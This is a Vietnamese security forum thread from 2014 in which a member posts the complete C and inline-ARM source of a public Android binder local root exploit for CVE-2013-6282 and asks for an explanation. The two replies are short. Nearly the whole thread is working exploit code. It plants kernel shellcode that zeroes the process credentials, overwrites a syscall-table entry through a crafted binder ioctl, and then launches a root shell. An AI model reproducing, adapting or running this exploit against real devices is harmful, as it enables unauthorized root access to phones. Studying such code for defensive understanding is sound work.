banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits hỏi cách phân tích 1 exploit  XML
  [Programming]   hỏi cách phân tích 1 exploit 14/08/2014 12:34:41 (+0700) | #1 | 281299
thánh rồi
Member

[Minus]    0    [Plus]
Joined: 03/08/2014 07:48:48
Messages: 1
Offline
[Profile] [PM]
anh em có thể phân tích cho em nhiệm vụ của code này không ạ
/*
* Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282.
*
* Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable.
* You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are
* restricted, thus no automation here.
*
* Rigged up by Piotr Szerman. (c) 2013
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* Binder transaction request format */
struct binder_write_read {
signed long write_size; /* bytes to write */
signed long write_consumed; /* bytes consumed by driver */
unsigned long write_buffer;
signed long read_size; /* bytes to read */
signed long read_consumed; /* bytes consumed by driver */
unsigned long read_buffer;
} bwr;

#define BR_NOOP 0x0000720c /* binder memory write value */
#define SC_TABLE 0xc000ee28 /* system call table address */
/* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly.
* you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other
* halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from
* /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place
*/
#define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */
#define MMAP_OFF 0xac4 /* offset within it to plant the payload */
#define NUM_PAGES 16
#define PAGE_SIZE 4096
#define NOP 0xe1a00000 /* mov r0, r0 */
#define SHELL "/system/bin/sh"
#define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */
#define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ smilie */

/* the target payload */
void __attribute__((regparm(3))) shellcode(void)
{
asm volatile(

"__transgressor:;"
"push {r0-r12,lr}" "\n\t"
"mov r1, sp" "\n\t" /* calculate the process descriptor location */
"bic r2, r1, #8128" "\n\t"
"bic r2, r2, #63" "\n\t"
"ldr r3, [r2, #12]" "\n\t"

"movt r0, #0" "\n\t"
"movw r0, #0" "\n\t"

"ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config.
* just build and objdump a kernel module with printk(current->cred->uid)
* to find out. or pinpoint it with the help of kgdb or whatever smilie
*/
"mov r4, #8" "\n\t"
"__loop_cred:;"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_cred" "\n\t"

"ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */
"mov r4, #8" "\n\t"
"__loop_real_cred:;"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_real_cred" "\n\t"

"ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */
"mov pc, lr" "\n\t"
);
}

int
main(int ac, char **av)
{
char * const shell[] = { SHELL, NULL };
char *map;
int fd;

fprintf(stderr, "[!] binder local root exploit\n[!] (c) piotr szerman\n"smilie;

fd = open("/dev/binder", O_RDWR);

if(fd < 0)
{
fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno));
exit(EXIT_FAILURE);
}

map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0);

if(map == (void *)-1)
{
perror("mmap() "smilie;
exit(EXIT_FAILURE);
}

fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map);

fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map);
memset(map, NOP, MMAP_OFF);
fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF);
/* look at the objdump of shellcode to see the correct offset */
memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */);

fprintf(stderr, "[+] constructing rogue data structure.\n"smilie;

bwr.write_size = 0;
bwr.write_consumed = 0;
bwr.read_size = 1;
bwr.read_consumed = 0;
/* targeting the aperture between 2 undefined system calls in the table */
bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2);

/* calculate process descriptor address with the aid of sp:
* task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3);
*/

ioctl(fd, BINDER_WRITE_READ, &bwr);
close(fd);

sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */

fprintf(stderr, "[+] r00ting device...\n\n"smilie;

asm volatile(
"mov r7, %0\n\t"
"swi 0\n\t"
: : "I" (TARGET_APERTURE)
);

execve(shell[0], shell, NULL);

return EXIT_FAILURE;
[Up] [Print Copy]
  [Programming]   hỏi cách phân tích 1 exploit 14/08/2014 19:19:12 (+0700) | #2 | 281303
[Avatar]
van7hu
Member

[Minus]    0    [Plus]
Joined: 03/07/2010 02:38:47
Messages: 63
Location: Thuỷ điện Hoà Bình
Offline
[Profile] [PM]
Một kernel exploit dành cho Android, code được viết trong ngôn ngữ C, và inline Assembly, code có thể được dịch bởi GCC, phần description được viết bằng tiếng
https://www.facebook.com/buivan.thu.94
Được phục vụ cho tổ quốc, đó là một niềm vinh hạnh lớn lao..
[Up] [Print Copy]
  [Programming]   hỏi cách phân tích 1 exploit 16/08/2014 02:47:54 (+0700) | #3 | 281319
hoangcuongflp
Member

[Minus]    0    [Plus]
Joined: 21/03/2014 06:42:47
Messages: 24
Offline
[Profile] [PM]
Các comment của họ đã giải thích nghĩa của đoạn code tương đối đầy đủ. Không biết bạn chưa hiểu đoạn nào?.
Mình là 1 con gà trong công nghệ.
Nếu mình có nói gì làm bạn không vui thì mong bạn bỏ qua cho, vì cá nhân mình còn gà lắm, và mình có ý tốt thôi.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|